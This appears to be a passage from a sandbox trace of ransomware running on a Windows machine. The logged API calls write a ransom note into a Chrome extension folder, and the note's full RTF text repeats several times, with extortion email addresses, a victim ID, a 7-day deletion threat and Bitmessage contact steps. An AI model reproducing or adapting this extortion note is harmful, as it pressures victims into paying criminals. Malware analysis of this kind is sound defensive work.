butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.751] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.752] CloseHandle (hObject=0x294) returned 1 [0297.752] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\#readme_eman#.rtf")) returned 0xffffffff [0297.752] GetLastError () returned 0x2 [0297.752] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\vi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.753] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r 